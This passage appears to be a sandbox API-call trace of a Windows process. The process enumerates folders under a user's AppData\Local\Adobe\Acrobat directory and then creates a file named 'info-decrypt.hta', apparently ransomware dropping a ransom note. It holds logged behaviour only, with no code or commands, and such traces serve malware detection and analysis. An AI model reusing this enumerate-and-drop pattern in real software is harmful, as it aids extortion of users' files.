dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0202.777] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 1 [0202.777] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 0 [0202.777] FindClose (in: hFindFile=0x77b430 | out: hFindFile=0x77b430) returned 1 [0202.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef25c) returned 1 [0202.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef268) returned 1 [0202.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef29c) returned 1 [0202.783] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", nBufferLength=0x105, lpBuffer=0x71eeda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", lpFilePart=0x0) returned 0x31 [0202.783] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", nBufferLength=0x105, lpBuffer=0x71eed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", lpFilePart=0x0) returned 0x32 [0202.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x71eefc4 | out: lpFindFileData=0x71eefc4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b430 [0202.784] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.785] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0202.785] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 1 [0202.785] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0202.785] FindClose (in: hFindFile=0x77b430 | out: hFindFile=0x77b430) returned 1 [0202.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef25c) returned 1 [0202.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef268) returned 1 [0202.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef24c) returned 1 [0202.786] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x71eed54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x39 [0202.786] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x71eed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x3a [0202.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x71eef74 | out: lpFindFileData=0x71eef74*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b430 [0202.786] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef84 | out: lpFindFileData=0x71eef84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.787] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef84 | out: lpFindFileData=0x71eef84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0202.787] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef84 | out: lpFindFileData=0x71eef84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0202.787] FindClose (in: hFindFile=0x77b430 | out: hFindFile=0x77b430) returned 1 [0202.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef20c) returned 1 [0202.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef218) returned 1 [0202.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef24c) returned 1 [0202.787] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x71eed54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x39 [0202.787] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x71eed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x3a [0202.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x71eef74 | out: lpFindFileData=0x71eef74*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b430 [0202.788] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef84 | out: lpFindFileData=0x71eef84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.788] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef84 | out: lpFindFileData=0x71eef84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0202.788] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef84 | out: lpFindFileData=0x71eef84*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0202.788] FindClose (in: hFindFile=0x77b430 | out: hFindFile=0x77b430) returned 1 [0202.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef20c) returned 1 [0202.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef218) returned 1 [0202.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1fc) returned 1 [0202.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x71eed04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x3e [0202.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x71eecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x3f [0202.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x71eef24 | out: lpFindFileData=0x71eef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b430 [0202.790] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.791] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0202.791] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeSysFnt10.lst", cAlternateFileName="ADOBES~1.LST")) returned 1 [0202.791] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0202.791] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd3b286a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd3b286a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xee0c3750, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharedDataEvents", cAlternateFileName="SHARED~1")) returned 1 [0202.791] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 1 [0202.792] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0202.792] FindClose (in: hFindFile=0x77b430 | out: hFindFile=0x77b430) returned 1 [0202.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1bc) returned 1 [0202.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1c8) returned 1 [0202.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1fc) returned 1 [0202.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x71eed04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x3e [0202.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x71eecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x3f [0202.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x71eef24 | out: lpFindFileData=0x71eef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b430 [0202.795] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.795] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0202.795] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeSysFnt10.lst", cAlternateFileName="ADOBES~1.LST")) returned 1 [0202.795] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0202.796] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd3b286a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd3b286a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xee0c3750, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharedDataEvents", cAlternateFileName="SHARED~1")) returned 1 [0202.796] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 1 [0202.796] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eef34 | out: lpFindFileData=0x71eef34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 0 [0202.797] FindClose (in: hFindFile=0x77b430 | out: hFindFile=0x77b430) returned 1 [0202.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1bc) returned 1 [0202.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1c8) returned 1 [0202.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x51 [0202.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x51 [0202.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0202.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef11c) returned 1 [0202.798] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef198 | out: lpFileInformation=0x71ef198*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef118) returned 1 [0202.799] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x51 [0202.799] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0202.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef050) returned 1 [0202.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a4 [0202.800] GetFileType (hFile=0x5a4) returned 0x1 [0202.800] SetThreadErrorMode 